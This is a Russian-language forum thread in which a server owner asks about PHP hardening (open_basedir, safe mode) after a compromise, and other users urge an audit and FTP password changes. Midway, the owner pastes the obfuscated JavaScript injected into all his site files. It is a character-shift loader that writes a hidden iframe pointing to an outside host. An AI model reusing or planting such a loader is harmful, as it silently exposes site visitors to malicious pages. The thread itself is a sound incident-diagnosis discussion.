Использование фото и файлов с другого аккаунта на одном сервере

[VAD]

Использование фото и файлов с другого аккаунта на одном сервере

Есть центральный портал и около 50 сайтов которые работают от одной базы и фото подкачивают с центального сайта с папки /photos/ также подкачивают пару файлов с настройками подкючения к базе. Все это находится на одном сервере и благополучно работало долгие годы. Но сервак был взломан и админ настоятельно рекомендовал усилить защиту ПХП и сделали следующее:

1. enabled safe mode
2. installed mod_security
3. enabled openbasedir protection.
4. disabled certain PHP functions.

Я так понимаю вся моя беда в openbasedir, как я могу реализовать свою задачу при включенном openbasedir?
Сервер мой т.е. админы делают то что я скажу. Насколько это не безопасно отключить openbasedir?

Буду очень благодарен за помощь

-~{}~ 22.10.08 05:52:

Самому приходит в голову такое решение проблемы:
сказать админам чтобы сделали доступ через open_basedir только к одному аккаунту /home/portal/www/
Может у кого-то еще какие-то идеи будут

 

[zerkms]

Я так понимаю вся моя беда в openbasedir

ты знаешь как взломали?

как я могу реализовать свою задачу при включенном openbasedir?

примонтировать фотос в нужную директорию в пределах бейсдира

 

[Фанат]

Офигеть какой замечательный админ.

 

[VAD]

Автор оригинала: zerkms
ты знаешь как взломали?

Нет не знаю, админы говорят что через форумы или wordpress

примонтировать фотос в нужную директорию в пределах бейсдира

Этот вариант я оставлю на крайний случай т.к. много кода придется править

-~{}~ 22.10.08 15:18:

Автор оригинала: *****
Офигеть какой замечательный админ.

я не админ. я владелец сервера

 

[Фанат]

Ты хочешь сказать, что весь этот зоопарк в пхп ини - твоя собственная инициатива?
Что именно рекомендовал этот "админ"? Так и сказал - "усилить безопасность сервера", и этим его функция исчерпалась?

 

[boombick]

Нет не знаю, админы говорят что через форумы или wordpress

а точно они сказать не могут? Может, имеет смысл заказать полноценный security-аудит?

 

[Фанат]

Меня больше всего удивляет в этой истории то, что он парит мозг не своим "админам", а обращается в спортлото.

VAD, это "админ" - это сотрудник за деньги или знакомый, который по дружбе присматривает?

 

[VAD]

Автор оригинала: *****
Ты хочешь сказать, что весь этот зоопарк в пхп ини - твоя собственная инициатива?
Что именно рекомендовал этот "админ"? Так и сказал - "усилить безопасность сервера", и этим его функция исчерпалась?

админ сказал:

в последнии дни участились случаи взлома по причине не безопасных скриптов особенно pressword, мы можем улучшить безопасность ПХП сделав следующие настройки

1. We have enabled safe mode
2. We have installed mod_security on your server.
3. We have enabled openbasedir protection.
4. We have disabled certain PHP functions.

Однако это может привести к потере работоспособности многих скриптов. Если хотите мы сделаем это.

Вот так, а я с этим согласился, что ж мне еще оставалось делать. Сейчас я их попросил дать доступ к одному только аккаунту чтобы решить свою проблему, написали что сделают.

А насчет security-аудита я бы не отказался только надо провереных людей чтобы, а то пароли кому зря не хочется раздавать. Можете порекомендовать кого-то

 

[Фанат]

Офигеть какой замечательный админ.

 

[VAD]

А админ у меня конечно за деньги platinumservermanagement.com
Правда мало берут но работают оперативно а вот о качестве судить трудно

 

[boombick]

Все, вопрос снят

 

[Фанат]

Надо нанять, может быть, пхп программиста, чтобы разобраться, с помощью логов веб-сервера, как именно был произведен взлом.

Но для начала следует выяснить, в чем этот взлом заключался.

 

[VAD]

В конце каждого хтмл или пхп файла где есть тэг </html> После этого был добавлен такой код:

[script]var source ="=jgsbnf!tsd](iuuq;00qsfwfewtfn234/do0360joefy/qiq(!xjeui]2!ifjhiu]2!gsbnfcpsefs]1?=0jgsbnf?"; var result = "";
for(var i=0;i[source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);
document.write(result); [/script]

И так на всех сайтах сервера.

 

[Фанат]

писец.
пароли на фтп смени, владелец заводов, сайтов, пароходов

 

[Lews]

Что-то помнится такое было, когда на моем компе завелся вирь... Тот по всем хранящимся в ФАРе фтпшникам прошелся, и во все хтмлки на сайте добавил в конец похожие скрипты.

 

[Фанат]

и домашний комп на вирусы проверь

 

[boombick]

А админ у меня конечно за деньги platinumservermanagement.com

Это не он у тебя за деньги, а ты у него один из тысячи

 

[VAD]

И че все фтп пароли менять у меня более 300 сайтов или только рут?

 

[HraKK]

на рут, но лучше конечно на все. А то что предложил админ - засунь ему же сам знаешь куда.

 

[dimagolov]

[offtopic]
VAD, тебя случайно не Еврений Попов учил пользоваться Total Commander-ом как лучшей тулзой для управления сайта?
[/offtopic]

VAD, ломать сайты пользуя дырки в php скриптах много сложнее чем затроянить комп с которого есть прозрачный доступ к ftp.